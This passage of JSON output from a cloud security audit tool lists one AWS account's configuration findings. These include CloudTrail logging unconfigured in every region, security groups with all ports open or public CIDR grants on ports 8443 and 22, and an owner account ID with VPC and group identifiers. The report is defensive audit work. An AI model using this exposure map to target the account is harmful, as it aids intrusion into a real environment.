["cloudtrail.regions.af-south-1.NotConfigured","cloudtrail.regions.ap-east-1.NotConfigured","cloudtrail.regions.ap-northeast-1.NotConfigured","cloudtrail.regions.ap-northeast-2.NotConfigured","cloudtrail.regions.ap-south-1.NotConfigured","cloudtrail.regions.ap-southeast-1.NotConfigured","cloudtrail.regions.ap-southeast-2.NotConfigured","cloudtrail.regions.ca-central-1.NotConfigured","cloudtrail.regions.eu-central-1.NotConfigured","cloudtrail.regions.eu-north-1.NotConfigured","cloudtrail.regions.eu-south-1.NotConfigured","cloudtrail.regions.eu-west-1.NotConfigured","cloudtrail.regions.eu-west-2.NotConfigured","cloudtrail.regions.eu-west-3.NotConfigured","cloudtrail.regions.me-south-1.NotConfigured","cloudtrail.regions.sa-east-1.NotConfigured","cloudtrail.regions.us-east-1.NotConfigured","cloudtrail.regions.us-east-2.NotConfigured","cloudtrail.regions.us-west-1.NotConfigured","cloudtrail.regions.us-west-2.NotConfigured"],"level": "danger","path": "cloudtrail.regions.id","rationale": "CloudTrail is not configured, which means that API activity is not logged.","service": "CloudTrail"}},"regions": {"af-south-1": {"region": "af-south-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ap-east-1": {"region": "ap-east-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ap-northeast-1": {"region": "ap-northeast-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ap-northeast-2": {"region": "ap-northeast-2","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ap-south-1": {"region": "ap-south-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ap-southeast-1": {"region": "ap-southeast-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ap-southeast-2": {"region": "ap-southeast-2","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"ca-central-1": {"region": "ca-central-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"eu-central-1": {"region": "eu-central-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"eu-north-1": {"region": "eu-north-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"eu-south-1": {"region": "eu-south-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"eu-west-1": {"region": "eu-west-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"eu-west-2": {"region": "eu-west-2","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"eu-west-3": {"region": "eu-west-3","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"me-south-1": {"region": "me-south-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"sa-east-1": {"region": "sa-east-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"us-east-1": {"region": "us-east-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"us-east-2": {"region": "us-east-2","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"us-west-1": {"region": "us-west-1","regions": {},"regions_count": 0,"trails": {},"trails_count": 0},"us-west-2": {"region": "us-west-2","regions": {},"regions_count": 0,"trails": {},"trails_count": 0}},"regions_count": 20,"resource_types": {"global": ["regions"],"region": ["trails"],"vpc": []},"service": "cloudtrail","targets": {"first_region": [["trails","trailList","describe_trails",{},false]],"other_regions": [["trails","trailList","describe_trails",{},false]]},"thread_config": {"list": 10,"parse": 20},"trails_count": 0},"cloudwatch": {"alarms_count": 0,"filters": {},"findings": {"cloudwatch-alarm-without-actions": {"checked_items": 0,"dashboard_name": "Alarms","description": "Alarm without action","flagged_items": 0,"id_suffix": "NoActions","items": [],"level": "warning","path": "cloudwatch.regions.id.alarms.id","rationale": "Each alarm should have at least one action","service": "CloudWatch"}},"regions": {"af-south-1": {"alarms": {},"alarms_count": 0,"region": "af-south-1"},"ap-east-1": {"alarms": {},"alarms_count": 0,"region": "ap-east-1"},"ap-northeast-1": {"alarms": {},"alarms_count": 0,"region": "ap-northeast-1"},"ap-northeast-2": {"alarms": {},"alarms_count": 0,"region": "ap-northeast-2"},"ap-northeast-3": {"alarms": {},"alarms_count": 0,"region": "ap-northeast-3"},"ap-south-1": {"alarms": {},"alarms_count": 0,"region": "ap-south-1"},"ap-southeast-1": {"alarms": {},"alarms_count": 0,"region": "ap-southeast-1"},"ap-southeast-2": {"alarms": {},"alarms_count": 0,"region": "ap-southeast-2"},"ca-central-1": {"alarms": {},"alarms_count": 0,"region": "ca-central-1"},"eu-central-1": {"alarms": {},"alarms_count": 0,"region": "eu-central-1"},"eu-north-1": {"alarms": {},"alarms_count": 0,"region": "eu-north-1"},"eu-south-1": {"alarms": {},"alarms_count": 0,"region": "eu-south-1"},"eu-west-1": {"alarms": {},"alarms_count": 0,"region": "eu-west-1"},"eu-west-2": {"alarms": {},"alarms_count": 0,"region": "eu-west-2"},"eu-west-3": {"alarms": {},"alarms_count": 0,"region": "eu-west-3"},"me-south-1": {"alarms": {},"alarms_count": 0,"region": "me-south-1"},"sa-east-1": {"alarms": {},"alarms_count": 0,"region": "sa-east-1"},"us-east-1": {"alarms": {},"alarms_count": 0,"region": "us-east-1"},"us-east-2": {"alarms": {},"alarms_count": 0,"region": "us-east-2"},"us-west-1": {"alarms": {},"alarms_count": 0,"region": "us-west-1"},"us-west-2": {"alarms": {},"alarms_count": 0,"region": "us-west-2"}},"regions_count": 21,"resource_types": {"global": [],"region": ["alarms"],"vpc": []},"service": "cloudwatch","targets": {"first_region": [["alarms","MetricAlarms","describe_alarms",{},false]],"other_regions": [["alarms","MetricAlarms","describe_alarms",{},false]]},"thread_config": {"list": 10,"parse": 20}},"directconnect": {"connections_count": 0,"filters": {},"findings": {},"regions": {"af-south-1": {"connections": {},"connections_count": 0,"region": "af-south-1"},"ap-east-1": {"connections": {},"connections_count": 0,"region": "ap-east-1"},"ap-northeast-1": {"connections": {},"connections_count": 0,"region": "ap-northeast-1"},"ap-northeast-2": {"connections": {},"connections_count": 0,"region": "ap-northeast-2"},"ap-northeast-3": {"connections": {},"connections_count": 0,"region": "ap-northeast-3"},"ap-south-1": {"connections": {},"connections_count": 0,"region": "ap-south-1"},"ap-southeast-1": {"connections": {},"connections_count": 0,"region": "ap-southeast-1"},"ap-southeast-2": {"connections": {},"connections_count": 0,"region": "ap-southeast-2"},"ca-central-1": {"connections": {},"connections_count": 0,"region": "ca-central-1"},"eu-central-1": {"connections": {},"connections_count": 0,"region": "eu-central-1"},"eu-north-1": {"connections": {},"connections_count": 0,"region": "eu-north-1"},"eu-south-1": {"connections": {},"connections_count": 0,"region": "eu-south-1"},"eu-west-1": {"connections": {},"connections_count": 0,"region": "eu-west-1"},"eu-west-2": {"connections": {},"connections_count": 0,"region": "eu-west-2"},"eu-west-3": {"connections": {},"connections_count": 0,"region": "eu-west-3"},"me-south-1": {"connections": {},"connections_count": 0,"region": "me-south-1"},"sa-east-1": {"connections": {},"connections_count": 0,"region": "sa-east-1"},"us-east-1": {"connections": {},"connections_count": 0,"region": "us-east-1"},"us-east-2": {"connections": {},"connections_count": 0,"region": "us-east-2"},"us-west-1": {"connections": {},"connections_count": 0,"region": "us-west-1"},"us-west-2": {"connections": {},"connections_count": 0,"region": "us-west-2"}},"regions_count": 21,"resource_types": {"global": ["connections"],"region": [],"vpc": []},"service": "directconnect","targets": {"first_region": [["connections","connections","describe_connections",{},false]],"other_regions": []},"thread_config": {"list": 10,"parse": 20}},"ec2": {"filters": {"ec2-instance-with-open-nacls": {"checked_items": 0,"dashboard_name": "ENIs","description": "Public instance with open NACLs","display_path": "ec2.regions.id.vpcs.id.instances.id","flagged_items": 0,"items": [],"level": "","path": "ec2.regions.id.vpcs.id.instances.id.network_interfaces.id","rationale": "","service": "EC2"},"ec2-security-group-with-public-cidr-grant": {"checked_items": 6,"dashboard_name": "Rules","description": "Security group whitelists public CIDRs","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 6,"items": ["ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.0-65535.cidrs.0.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.0.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.1.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.2.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.3.CIDR","ec2.regions.eu-west-3.vpcs.vpc-87d3fdee.security_groups.sg-000c4c21c24f75b85.rules.ingress.protocols.TCP.ports.22.cidrs.0.CIDR"],"level": "","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.ingress.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"}},"findings": {"ec2-default-security-group-in-use": {"checked_items": 20,"dashboard_name": "Security groups","description": "Default security groups in use","flagged_items": 0,"id_suffix": "default_in_use","items": [],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id","rationale": "N/A","service": "EC2"},"ec2-default-security-group-with-rules": {"checked_items": 40,"dashboard_name": "Rulesets","description": "Non-empty rulesets for default security groups","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 34,"id_suffix": "default_with_rules","items": ["ec2.regions.ap-northeast-1.vpcs.vpc-0cbc506a.security_groups.sg-6569b32b.rules.ingress.default_with_rules","ec2.regions.ap-northeast-1.vpcs.vpc-0cbc506a.security_groups.sg-6569b32b.rules.egress.default_with_rules","ec2.regions.ap-northeast-2.vpcs.vpc-73f44e18.security_groups.sg-854e9bfe.rules.ingress.default_with_rules","ec2.regions.ap-northeast-2.vpcs.vpc-73f44e18.security_groups.sg-854e9bfe.rules.egress.default_with_rules","ec2.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.security_groups.sg-9be71df6.rules.ingress.default_with_rules","ec2.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.security_groups.sg-9be71df6.rules.egress.default_with_rules","ec2.regions.ap-south-1.vpcs.vpc-2651a14d.security_groups.sg-3e983346.rules.ingress.default_with_rules","ec2.regions.ap-south-1.vpcs.vpc-2651a14d.security_groups.sg-3e983346.rules.egress.default_with_rules","ec2.regions.ap-southeast-1.vpcs.vpc-04ed1062.security_groups.sg-71eb4839.rules.ingress.default_with_rules","ec2.regions.ap-southeast-1.vpcs.vpc-04ed1062.security_groups.sg-71eb4839.rules.egress.default_with_rules","ec2.regions.ap-southeast-2.vpcs.vpc-5d22c33b.security_groups.sg-8a48ccc0.rules.ingress.default_with_rules","ec2.regions.ap-southeast-2.vpcs.vpc-5d22c33b.security_groups.sg-8a48ccc0.rules.egress.default_with_rules","ec2.regions.ca-central-1.vpcs.vpc-b5113ddd.security_groups.sg-62215504.rules.ingress.default_with_rules","ec2.regions.ca-central-1.vpcs.vpc-b5113ddd.security_groups.sg-62215504.rules.egress.default_with_rules","ec2.regions.eu-central-1.vpcs.vpc-78b43312.security_groups.sg-c1194bbf.rules.ingress.default_with_rules","ec2.regions.eu-central-1.vpcs.vpc-78b43312.security_groups.sg-c1194bbf.rules.egress.default_with_rules","ec2.regions.eu-north-1.vpcs.vpc-fa259d93.security_groups.sg-09c1e96a.rules.ingress.default_with_rules","ec2.regions.eu-north-1.vpcs.vpc-fa259d93.security_groups.sg-09c1e96a.rules.egress.default_with_rules","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-186a6a69.rules.ingress.default_with_rules","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-186a6a69.rules.egress.default_with_rules","ec2.regions.eu-west-2.vpcs.vpc-3fa2fa57.security_groups.sg-223b755a.rules.ingress.default_with_rules","ec2.regions.eu-west-2.vpcs.vpc-3fa2fa57.security_groups.sg-223b755a.rules.egress.default_with_rules","ec2.regions.eu-west-3.vpcs.vpc-87d3fdee.security_groups.sg-4cc9d827.rules.ingress.default_with_rules","ec2.regions.eu-west-3.vpcs.vpc-87d3fdee.security_groups.sg-4cc9d827.rules.egress.default_with_rules","ec2.regions.sa-east-1.vpcs.vpc-b14fa4d7.security_groups.sg-3965844c.rules.ingress.default_with_rules","ec2.regions.sa-east-1.vpcs.vpc-b14fa4d7.security_groups.sg-3965844c.rules.egress.default_with_rules","ec2.regions.us-east-1.vpcs.vpc-ba1cbdc7.security_groups.sg-4574a94e.rules.ingress.default_with_rules","ec2.regions.us-east-1.vpcs.vpc-ba1cbdc7.security_groups.sg-4574a94e.rules.egress.default_with_rules","ec2.regions.us-east-2.vpcs.vpc-e429ad8f.security_groups.sg-a81474db.rules.ingress.default_with_rules","ec2.regions.us-east-2.vpcs.vpc-e429ad8f.security_groups.sg-a81474db.rules.egress.default_with_rules","ec2.regions.us-west-1.vpcs.vpc-6e6fa508.security_groups.sg-778f4e3e.rules.ingress.default_with_rules","ec2.regions.us-west-1.vpcs.vpc-6e6fa508.security_groups.sg-778f4e3e.rules.egress.default_with_rules","ec2.regions.us-west-2.vpcs.vpc-d45709ac.security_groups.sg-a9b5628e.rules.ingress.default_with_rules","ec2.regions.us-west-2.vpcs.vpc-d45709ac.security_groups.sg-a9b5628e.rules.egress.default_with_rules"],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id","rationale": "N/A","service": "EC2"},"ec2-ebs-volume-not-encrypted": {"checked_items": 0,"dashboard_name": "Volumes","description": "EBS volume not encrypted","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.volumes.id","rationale": "Enabling encryption of EBS volumes ensures that data is encrypted both at-rest and in-transit (between an instance and its attached EBS storage).","service": "EC2"},"ec2-security-group-opens-DNS-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "DNS port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-MongoDB-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "MongoDB port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-MsSQL-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "MsSQL port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-MySQL-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "MySQL port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-NFS-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "NFS port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-Oracle DB-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "Oracle DB port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-PostgreSQL-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "PostgreSQL port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-RDP-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "RDP port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-SMTP-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "SMTP port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-SSH-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "SSH port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-TCP-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "TCP port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-UDP-port-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "UDP port open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-all-ports": {"checked_items": 45,"dashboard_name": "Rules","description": "All ports open","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 21,"items": ["ec2.regions.ap-northeast-1.vpcs.vpc-0cbc506a.security_groups.sg-6569b32b.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.ap-northeast-2.vpcs.vpc-73f44e18.security_groups.sg-854e9bfe.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.security_groups.sg-9be71df6.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.ap-south-1.vpcs.vpc-2651a14d.security_groups.sg-3e983346.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.ap-southeast-1.vpcs.vpc-04ed1062.security_groups.sg-71eb4839.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.ap-southeast-2.vpcs.vpc-5d22c33b.security_groups.sg-8a48ccc0.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.ca-central-1.vpcs.vpc-b5113ddd.security_groups.sg-62215504.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.eu-central-1.vpcs.vpc-78b43312.security_groups.sg-c1194bbf.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.eu-north-1.vpcs.vpc-fa259d93.security_groups.sg-09c1e96a.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-02063087593480392.rules.ingress.protocols.TCP.ports.0-65535","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-02063087593480392.rules.ingress.protocols.UDP.ports.0-65535","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.0-65535","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.UDP.ports.0-65535","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-186a6a69.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.eu-west-2.vpcs.vpc-3fa2fa57.security_groups.sg-223b755a.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.eu-west-3.vpcs.vpc-87d3fdee.security_groups.sg-4cc9d827.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.sa-east-1.vpcs.vpc-b14fa4d7.security_groups.sg-3965844c.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.us-east-1.vpcs.vpc-ba1cbdc7.security_groups.sg-4574a94e.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.us-east-2.vpcs.vpc-e429ad8f.security_groups.sg-a81474db.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.us-west-1.vpcs.vpc-6e6fa508.security_groups.sg-778f4e3e.rules.ingress.protocols.ALL.ports.N/A","ec2.regions.us-west-2.vpcs.vpc-d45709ac.security_groups.sg-a9b5628e.rules.ingress.protocols.ALL.ports.N/A"],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-all-ports-to-all": {"checked_items": 26,"dashboard_name": "Rules","description": "All ports open to all","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-all-ports-to-self": {"checked_items": 29,"dashboard_name": "Rules","description": "Unrestricted network traffic within security group","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 21,"items": ["ec2.regions.ap-northeast-1.vpcs.vpc-0cbc506a.security_groups.sg-6569b32b.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.ap-northeast-2.vpcs.vpc-73f44e18.security_groups.sg-854e9bfe.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.ap-northeast-3.vpcs.vpc-47b7dd2e.security_groups.sg-9be71df6.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.ap-south-1.vpcs.vpc-2651a14d.security_groups.sg-3e983346.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.ap-southeast-1.vpcs.vpc-04ed1062.security_groups.sg-71eb4839.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.ap-southeast-2.vpcs.vpc-5d22c33b.security_groups.sg-8a48ccc0.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.ca-central-1.vpcs.vpc-b5113ddd.security_groups.sg-62215504.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.eu-central-1.vpcs.vpc-78b43312.security_groups.sg-c1194bbf.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.eu-north-1.vpcs.vpc-fa259d93.security_groups.sg-09c1e96a.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-02063087593480392.rules.ingress.protocols.TCP.ports.0-65535.security_groups.0","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-02063087593480392.rules.ingress.protocols.UDP.ports.0-65535.security_groups.0","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.0-65535.security_groups.1","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.UDP.ports.0-65535.security_groups.1","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-186a6a69.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.eu-west-2.vpcs.vpc-3fa2fa57.security_groups.sg-223b755a.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.eu-west-3.vpcs.vpc-87d3fdee.security_groups.sg-4cc9d827.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.sa-east-1.vpcs.vpc-b14fa4d7.security_groups.sg-3965844c.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.us-east-1.vpcs.vpc-ba1cbdc7.security_groups.sg-4574a94e.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.us-east-2.vpcs.vpc-e429ad8f.security_groups.sg-a81474db.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.us-west-1.vpcs.vpc-6e6fa508.security_groups.sg-778f4e3e.rules.ingress.protocols.ALL.ports.N/A.security_groups.0","ec2.regions.us-west-2.vpcs.vpc-d45709ac.security_groups.sg-a9b5628e.rules.ingress.protocols.ALL.ports.N/A.security_groups.0"],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.security_groups.id","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-plaintext-port-FTP": {"checked_items": 45,"dashboard_name": "Rules","description": "FTP port open","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-plaintext-port-Telnet": {"checked_items": 45,"dashboard_name": "Rules","description": "Telnet port open","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id","rationale": "N/A","service": "EC2"},"ec2-security-group-opens-port-range": {"checked_items": 45,"dashboard_name": "Rules","description": "Use of port ranges","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id","rationale": "N/A","service": "EC2"},"ec2-security-group-whitelists-aws": {"checked_items": 26,"dashboard_name": "Rules","description": "Security group whitelists AWS CIDRs","display_path": "ec2.regions.id.vpcs.id.security_groups.id","flagged_items": 4,"items": ["ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.0.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.1.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.2.CIDR","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171.rules.ingress.protocols.TCP.ports.8443.cidrs.3.CIDR"],"level": "danger","path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR","rationale": "N/A","service": "EC2"},"ec2-unused-security-group": {"checked_items": 20,"dashboard_name": "Security groups","description": "Unused security groups","flagged_items": 3,"items": ["ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-02063087593480392","ec2.regions.eu-west-1.vpcs.vpc-f24c7994.security_groups.sg-0c59ae38c42100171","ec2.regions.eu-west-3.vpcs.vpc-87d3fdee.security_groups.sg-000c4c21c24f75b85"],"level": "warning","path": "ec2.regions.id.vpcs.id.security_groups.id","rationale": "N/A","service": "EC2"}},"instances_count": 0,"network_interfaces_count": 0,"regions": {"af-south-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "af-south-1","security_groups_count": 0,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {}},"ap-east-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-east-1","security_groups_count": 0,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {}},"ap-northeast-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-northeast-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-0cbc506a": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-6569b32b": {"description": "default VPC security group","id": "sg-6569b32b","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-6569b32b","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"ap-northeast-2": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-northeast-2","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-73f44e18": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-854e9bfe": {"description": "default VPC security group","id": "sg-854e9bfe","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-854e9bfe","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"ap-northeast-3": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-northeast-3","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-47b7dd2e": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-9be71df6": 